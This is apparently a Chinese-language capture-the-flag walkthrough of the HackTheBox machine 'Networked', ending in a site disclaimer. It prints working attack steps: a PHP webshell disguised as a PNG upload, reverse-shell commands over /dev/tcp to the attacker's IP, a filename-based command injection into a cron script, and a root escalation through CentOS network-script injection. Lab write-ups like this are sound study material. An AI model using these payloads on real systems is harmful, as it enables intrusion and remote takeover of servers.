信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.146 | TCP:22,80 |
$ nmap -p- 10.10.10.146 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
| 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_ 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
HTTP
http://10.10.10.146/
![[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图](https://img.4awl.net/img/e8/fd474036d85c31ffba013f9a7072d3.jpg "[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图")
$ gobuster dir -u "http://10.10.10.146/" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x html,txt,php -b 404,403 -t 50
![[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图1](https://img.4awl.net/img/ea/6dc8e56964f8a72f2afb6a3bf4f20c.jpg "[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图1")
$ wget http://10.10.10.146/backup/backup.tar;tar xvf backup.tar
![[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图2](https://img.4awl.net/img/c1/460db9225f27fa385e6a46749ba3fe.jpg "[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图2")
![[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图3](https://img.4awl.net/img/ad/6e33c75f2461d255ecaf4c074ef3f8.jpg "[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图3")
$ cat lib.php
![[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图4](https://img.4awl.net/img/0f/195e7909b0954fbe2f19c15724c491.jpg "[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图4")
Apache 2.4.x存在向上解析漏洞
![[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图5](https://img.4awl.net/img/c0/afb97c15661f040cdf96c51445ce86.jpg "[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图5")
$ echo '89 50 4E 47 0D 0A 1A 0A' | xxd -p -r >shell.php.png
$ echo '<?php system($_GET[1]);?>'>>shell.php.png
![[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图6](https://img.4awl.net/img/5d/faa2042abae27417a41e4573e1e4de.jpg "[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图6")
http://10.10.10.146/photos.php
![[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图7](https://img.4awl.net/img/71/5d6d8bfef06c910480b57b239ee6ab.jpg "[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图7")
http://10.10.10.146/uploads/10_10_16_14.php.png?1=dir
![[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图8](https://img.4awl.net/img/51/a367e4534bca5838d007bb09e8eb87.jpg "[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图8")
$ curl 'http://10.10.10.146/uploads/10_10_16_14.php.png?1=%2fbin%2fbash+-c+%27bash+-i+%3e%26+%2fdev%2ftcp%2f10.10.16.14%2f10032+0%3e%261%27'
![[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图9](https://img.4awl.net/img/4b/5541e23a2169d627b9784eb7d53460.jpg "[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图9")
定时任务命令注入
![[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图10](https://img.4awl.net/img/37/6d999e7c70fd2e33a81661c336a5b4.jpg "[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图10")
![[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图11](https://img.4awl.net/img/52/4b276e1f9929f3e4ef22ac3fcd81f3.jpg "[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图11")
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
这段脚本列出 /uploads 文件夹中的文件,并根据文件名检查其有效性。任何无效的文件都通过 system exec() 函数被删除。
$value 变量存储了文件名,但脚本没有对其进行清理,这意味着我们可以通过特殊的文件名注入命令。例如,一个名为 "; cmd 的文件会导致以下命令被执行:
nohup /bin/rm -f $path;cmd > /dev/null 2>&1 &
$ cd /var/www/html/uploads; reverse=$(echo -n 'bash -c "bash -i >/dev/tcp/10.10.16.14/10034 0>&1"' | base64); touch -- "; echo $reverse | base64 -d | bash"
![[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图12](https://img.4awl.net/img/58/d7419665bf52b2d50315f685f7794b.jpg "[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图12")
User.txt
6b914b0701e297b83c7e6d052dc37247
权限提升
[guly@networked /]$ sudo -l
[guly@networked /]$ cat /usr/local/sbin/changename.sh
![[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图13](https://img.4awl.net/img/ad/139dc86c04fac6010162c8020c561c.jpg "[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图13")
脚本为 guly0 网络接口创建配置,并在最后使用 ifup guly0 来激活它。用户输入经过验证,只允许字母数字字符、斜杠或破折号。CentOS 上的网络配置脚本对命令注入存在漏洞,因为这些脚本会被底层服务引用,导致任何在空格后的内容都会被执行。我们可以利用这个漏洞通过执行 /bin/bash 作为 root 用户。
sudo /usr/local/sbin/changename.sh
x /bin/bashxxx
![[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图14](https://img.4awl.net/img/ef/24e1232fade8da03220cf4042e8428.jpg "[Meachines] [Easy] Networked 源码泄露-Upload+Apache中间件…插图14")
Root.txt
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
